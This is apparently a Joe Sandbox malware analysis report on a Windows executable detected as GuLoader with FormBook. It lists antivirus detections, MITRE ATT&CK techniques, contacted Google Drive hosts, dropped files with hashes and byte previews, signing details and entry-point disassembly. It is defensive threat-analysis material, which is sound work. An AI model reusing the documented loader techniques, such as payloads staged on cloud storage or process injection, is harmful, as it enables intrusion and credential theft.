      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping111
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
      Process Injection      		1
      Access Token Manipulation      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Abuse Elevation Control Mechanism      		312
      Process Injection      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		NTDS13
      System Information Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Abuse Elevation Control Mechanism      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
      Obfuscated Files or Information      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      LkzvfB4VFj.exe55%ReversingLabsWin32.Trojan.Guloader
      LkzvfB4VFj.exe100%AviraTR/Injector.kowvu

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
      http://www.quovadis.bm00%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.72.110
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.65.225
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comLkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdLkzvfB4VFj.exe, 00000003.00000001.92670024894.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
              		high
              http://nsis.sf.net/NSIS_ErrorLkzvfB4VFj.exefalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.com/LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                  		high
                  http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdLkzvfB4VFj.exe, 00000003.00000001.92670024894.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                    		high
                    https://drive.google.com/.LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.quovadis.bm0LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.usercontent.google.com/LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://apis.google.comLkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorErrorLkzvfB4VFj.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDLkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                            		high
                            https://ocsp.quovadisoffshore.com0LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.gopher.ftp://ftp.LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.usercontent.google.com/TLkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.72.110
                              		drive.google.comUnited States
                              		15169GOOGLEUSfalse
                              142.250.65.225
                              		drive.usercontent.google.comUnited States
                              		15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1552178
                              Start date and time:2024-11-08 14:19:32 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 15m 14s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:4
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:LkzvfB4VFj.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@3/8@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 89%
                              • Number of executed functions: 54
                              • Number of non-executed functions: 295
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: LkzvfB4VFj.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              No context

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              37f463bf4616ecd445d4a1937da06e19gjbrNWQeg1.exeGet hashmaliciousGuLoaderBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              kJyOzzBNim.exeGet hashmaliciousGuLoaderBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              7DqFctwwsk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              6cUI1ZCp5E.exeGet hashmaliciousGuLoaderBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              FcRCSylOMs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              kChWJJNUHz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              Y725GT96z1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              z3356_DNF_E2I36P5K_26.msiGet hashmaliciousUnknownBrowse
                              • 142.250.65.225
                              • 142.250.72.110
                              4YgQ2xN41W.lnkGet hashmaliciousRDPWrap Tool, DucktailBrowse
                              • 142.250.65.225
                              • 142.250.72.110

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dllz120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                Quotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  Produkttyper.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    Impressionist.exeGet hashmaliciousGuLoaderBrowse
                                      PAGO.exeGet hashmaliciousGuLoaderBrowse
                                        PAGO.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          Obstetricated.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            Orden de compra.exeGet hashmaliciousGuLoaderBrowse
                                              Orden de compra.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):5.854450882766351
                                                Encrypted:false
                                                SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious, Browse
                                                • Filename: Quotation-GINC-19-00204.exe, Detection: malicious, Browse
                                                • Filename: Produkttyper.exe, Detection: malicious, Browse
                                                • Filename: Impressionist.exe, Detection: malicious, Browse
                                                • Filename: PAGO.exe, Detection: malicious, Browse
                                                • Filename: PAGO.exe, Detection: malicious, Browse
                                                • Filename: Obstetricated.exe, Detection: malicious, Browse
                                                • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\tranchet\Bordelaisesaucernes.eft

                                                Download File
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):457024
                                                Entropy (8bit):2.657648980780291
                                                Encrypted:false
                                                SSDEEP:1536:q9QYlyFgTDQ27YRJknuJpCrouPJezz3WvLuzBHeCswIX2diBo4z02gt/p3UEP5sa:aBJUcbZzqN7zh+syt1esyn24MGptl
                                                MD5:3E65AB856E3180279BBD28D11CBBB8B2
                                                SHA1:36BF6F2278D3EDF764C5D6F06FEE67251EF34C36
                                                SHA-256:4B8EB25D2A1328E2FDEE9A1F7654F02DD18401643C82C36BA56C92ECAA769BCD
                                                SHA-512:CB9ABA7BA1BD722FA82E2E7BF8A7BE6AE7D8DD56B599390AB26B14D7A27367284D8A4646A2634D671A5E65F422FB46DF473C065A532FB260DB473D69A2C1DF7C
                                                Malicious:false
                                                Reputation:low
                                                Preview:0000C30000B300000000C60000000000BC002323230000000000313100B2B2B20000008C0000008F00FCFC00F8F8F8F800575757002400D200C0000000FC0000000063000000B5000000EE0000B300260000003400D2000E009A00CC0058000000F8F800181800004E4E000000000000000000696969690000730000D9D900FC0000000000005B0000000093939300006600002323000026000000EC00DE004A4A4A005000360000007878780000000000000011000000EA00656500000000D9D90070000000A000B70000BEBE000E001F0000006D6D6D6D00B8B800A2A2A2007200BD001D00C500000100ED003C3C0030303000005E007171717171006A6A6A6A006C006060008400B30000BEBEBE00009E000000720000F700AC0000000000000000004F000000999900000000000000007B000071004D0000EFEFEFEF00003800BB0000070000530000008686860027272727000000460068006A0029000000002E003333333300F2F2F2F2007F7F0072000000757575757500210000004F0000009F00B1000000000021210000969696960087006C00EEEE0000AF00000094007979001C009A0000D4009F00000000000000D4D4000028009500D7D7000000930000AE00383838000000008181810000004A006E6E0000000000A6A6A6A6A6A6A60000000010101000000085009D00000055

                                                C:\Users\user\tranchet\Lavninger.Dis

                                                Download File
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):214005
                                                Entropy (8bit):7.5415932130722165
                                                Encrypted:false
                                                SSDEEP:6144:rphX8N6JOmQClcEjFK/FPpQP3JwCmzBXWdkD9:rq64DgRjo/3c3JwtBXEu
                                                MD5:2137D24C988EC559DA788C41A4F5235C
                                                SHA1:59BDC7C8B86ADCC1EBB44C9E71954EAB87BA8C3D
                                                SHA-256:74779ACCBD7DD2E132B02DA893F6BFC1D54E7AB601F209CD6DD831E5B614D055
                                                SHA-512:D212C5F7ECA211EC963A29448AFEE01D98A0E4428D082E4E4D6E96344F24849398F243E0180DCC37B79F5415BBC4F56D170891AC58059B69EE6105F7A60C9E91
                                                Malicious:false
                                                Reputation:low
                                                Preview:..EE.~..........e.:......[.T............''''...FF..................MM.....................::..FF...........s.hh.666......v.22........PPPP..2.........wwww.....!!.U.........@@................%%%.............}}}}}........i......EE........NN.......?????...O.,...../...........................8..%......k......Z.99........9........||||............UU...kkk.44.....y..............K......?............................................;..11.........[...@@.x.%...Q...........FFF............S........3..................OO.....................................n.................}}.........$...tttt........ccc...~~~..r.4...................ppppp............EE........``.R...............N........................7.........WW.........D.....4........rrr.........................dddd.....................Q............B......--.VV.........t...vv.............F.\\..$...........!..........uuu.....T.........77.......>>.....-.......Q...................x.88888....................[[.................................!!........

                                                C:\Users\user\tranchet\Triformity\receptionssekretrer.bin

                                                Download File
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):442363
                                                Entropy (8bit):1.2533707838755617
                                                Encrypted:false
                                                SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                MD5:5465B75724C031B21C018F7D72941F72
                                                SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................

                                                C:\Users\user\tranchet\Triformity\serenissimi.txt

                                                Download File
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):521
                                                Entropy (8bit):4.284169749449499
                                                Encrypted:false
                                                SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                Malicious:false
                                                Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.

                                                C:\Users\user\tranchet\computerskrmen.dem

                                                Download File
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):485127
                                                Entropy (8bit):1.2565961974341746
                                                Encrypted:false
                                                SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                MD5:580D05E679E74B036B55CA8E5FF32769
                                                SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                Malicious:false
                                                Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............

                                                C:\Users\user\tranchet\predictors.dut

                                                Download File
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):389868
                                                Entropy (8bit):1.2469892412772452
                                                Encrypted:false
                                                SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                Malicious:false
                                                Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................

                                                C:\Windows\Arder.lnk

                                                Download File
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):734
                                                Entropy (8bit):3.2819121006350698
                                                Encrypted:false
                                                SSDEEP:12:8wl01sXUCTGlnEEqEu3w/g/rNJkKAh4t2YCBTo8:82svqo/45HALJT
                                                MD5:77093B00B23F98CBA6C0D1C948350193
                                                SHA1:D8DB917CC95435D80B446AA38B623377B39D9E18
                                                SHA-256:ABEC3A36956C827AE67D077F005B6CEAA616B58A4BE7202DEAC7058936AE8042
                                                SHA-512:FB8659401E24C2445B4718338E6FDEBD55A0CD2A783EAB278845582E959A2CB03E06C1D30E8144998819A8DA71129B4E58D1395122E4988E08EC71F6CF6B9D92
                                                Malicious:false
                                                Preview:L..................F........................................................?....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.i.s.a.n.n.e.x...A.n.d.3.7.$.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.547909639119886
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:LkzvfB4VFj.exe
                                                File size:892'576 bytes
                                                MD5:a5104b4d665dc081181fd163dce0bb77
                                                SHA1:e72855a64aace2ecf6aa008942e443d2ac7508d7
                                                SHA256:aa047fd2e21f33564c1178d063122fc9368afc5c6a5455c4381a3f5edde4b145
                                                SHA512:0ea16a9731ee607e601e385b69b860a80b81455a1279df9b2e81f1e6b879454ca1dda8ddb5dce70d610d21f4e16eba6a4d289ea18da17d354c63d97180126507
                                                SSDEEP:24576:DiGFaq43NvCkZsAFNgXDYRujTrl6foV0GSxnKSkAJ/QOeaI:DiGFu3Nv0AFTSd6foV0PxKSkAJ/qaI
                                                TLSH:F81512B2F240E86AD8298F724C5ED142DBE5BE1869142B9F3FE67F1A7D71060C10F646
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@

                                                File Icon

                                                Icon Hash:0e13672535353f1c

                                                Static PE Info

                                                General

                                                Entrypoint:0x403348
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:ced282d9b261d1462772017fe2f6972b

                                                Authenticode Signature

                                                Signature Valid:false
                                                Signature Issuer:CN="Diaskopernes unboisterousness Lejemorderen ", E=Indaandendes6@Menubilledet.Gup, L=West Edmeston, S=New York, C=US
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 09/02/2024 12:49:35 08/02/2027 12:49:35
                                                Subject Chain
                                                • CN="Diaskopernes unboisterousness Lejemorderen ", E=Indaandendes6@Menubilledet.Gup, L=West Edmeston, S=New York, C=US
                                                Version:3
                                                Thumbprint MD5:23ECB3AE0DB84F37E645DFECF9E00369
                                                Thumbprint SHA-1:7BBAA847C80C3FC9EEE3E7553C7728484F48024F
                                                Thumbprint SHA-256:40A2C2D67EED47AD53A368EF27A455144F4D61004EB513B02F398F3D0BA70D20
                                                Serial:09AF69515B952A9E5094BDF9D17A589BED2D6528

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+18h], ebx
                                                mov dword ptr [esp+10h], 0040A198h
                                                mov dword ptr [esp+20h], ebx
                                                mov byte ptr [esp+14h], 00000020h
                                                call dword ptr [004080B8h]
                                                call dword ptr [004080BCh]
                                                and eax, BFFFFFFFh
                                                cmp ax, 00000006h
                                                mov dword ptr [0042F42Ch], eax
                                                je 00007F123C5FDA43h
                                                push ebx
                                                call 00007F123C600BA6h
                                                cmp eax, ebx
                                                je 00007F123C5FDA39h
                                                push 00000C00h
                                                call eax
                                                mov esi, 004082A0h
                                                push esi
                                                call 00007F123C600B22h
                                                push esi
                                                call dword ptr [004080CCh]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007F123C5FDA1Dh
                                                push 0000000Bh
                                                call 00007F123C600B7Ah
                                                push 00000009h
                                                call 00007F123C600B73h
                                                push 00000007h
